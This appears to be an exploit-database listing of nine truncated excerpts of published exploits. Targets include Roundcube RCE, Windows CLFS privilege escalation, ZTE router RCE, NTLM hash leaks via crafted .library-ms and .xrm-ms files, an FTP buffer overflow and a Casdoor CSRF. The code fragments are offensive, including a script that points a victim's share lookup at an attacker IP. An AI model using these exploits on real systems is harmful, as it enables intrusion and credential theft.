import os import tarfile def main(): file_name = input(“Enter your file name: “) ip_address = input(“Enter IP (EX: 192.168.1.162): “) library_content = f””” \\\\{ip_address}\\IT “”” library_file_name = f”{file_name}.library-ms” with open(library_file_name, “w”, encoding=”utf-8″) as f: f.write(library_content) tar_name = “exploit.tar” with tarfile.open(tar_name, “w”) as tarf: …
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, ‘Name’ => ‘Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization’, ‘Description’ => %q{ Roundcube Webmail before 1.5.10…
# Exploit Title: Freefloat FTP Server 1.0 – Remote Buffer Overflow # Date: 22 may 2025 # Notification vendor: No reported # Discovery by: Fernando Mengali # LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/ # Version: 1.0 # Tested on: Windows XP SP3 English – # Version 5.1 (Build 2600.xpsp.080413-2111 : Service Pack 3) # Vulnerability Type: Remote Buffer Overflow …
# Exploit Title: Microsoft Windows 11 23h2 – CLFS.sys Elevation of Privilege # Date: 2025-04-16 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # CVE: CVE-2024-49138 #include #include #include #include #include #include #include #include #include #include…
# Exploit Title: unzip-stream 0.3.1 – Arbitrary File Write # Date: 18th April, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Software link: https://github.com/mhr3/unzip-stream # Version: unzip-stream 0.3.1 # Tested on: Ubuntu # CVE: CVE-2024-42471 # NB: Python’s built-in `zipfile` module has limitations on the `arcname` parameter. # To bypass…
# Exploit title: Microsoft – NTLM Hash Disclosure Spoofing (library-ms) # Exploit Author: John Page (aka hyp3rlinx) # x.com/hyp3rlinx # ISR: ApparitionSec Back in 2018, I reported a “.library-ms” File NTLM information disclosure vulnerability to MSRC and was told “it was not severe enough”, that being said I post it anyways. Seven years passed,…
# Exploit Title: ZTE ZXV10 H201L – RCE via authentication bypass # Exploit Author: l34n (tasos meletlidis) # https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/ import http.client, requests, os, argparse, struct, zlib from io import BytesIO from os import stat from Crypto.Cipher import AES def login(session, host, port, username, password): login_token = session.get(f”http://{host}:{port}/”).text.split(“getObj(\”Frm_Logintoken\”).value = \””)[1].split(“\””)[0] headers = { …
# Daikin Security Gateway 214 – Remote Password Reset # Vendor: Daikin Industries, Ltd. # Product web page: https://www.daikin.com # https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html # Affected version: App: 100, Frm: 214 # # Summary: The Security gateway allows the iTM and LC8 controllers # to connect through the Security gateway to the Daikin Cloud Service. # Instead of…
# Exploit Author: John Page (aka hyp3rlinx) # Website: hyp3rlinx.altervista.org # Source: https://hyp3rlinx.altervista.org/advisories/Microsoft_Windows_xrm-ms_File_NTLM-Hash_Disclosure.txt # x.com/hyp3rlinx # ISR: ApparitionSec [Vendor] www.microsoft.com [Product] .xrm-ms File Type [Vulnerability Type] NTLM Hash Disclosure (Spoofing) [Video URL PoC] [CVE Reference] N/A [Security Issue] The Windows XRM-MS…
# Exploit Title: Casdoor 1.901.0 – Cross-Site Request Forgery (CSRF) # Application: Casdoor # Version: 1.901.0 # Date: 03/07/2024 # Exploit Author: Van Lam Nguyen # Vendor Homepage: https://casdoor.org/ # Software Link: https://github.com/casdoor/casdoor/archive/refs/tags/v1.901.0.zip # Tested on: Windows # CVE : N/A Overview ================================================== Casdoor v1.901.0 and below was discovered to contain a Cross-Site…
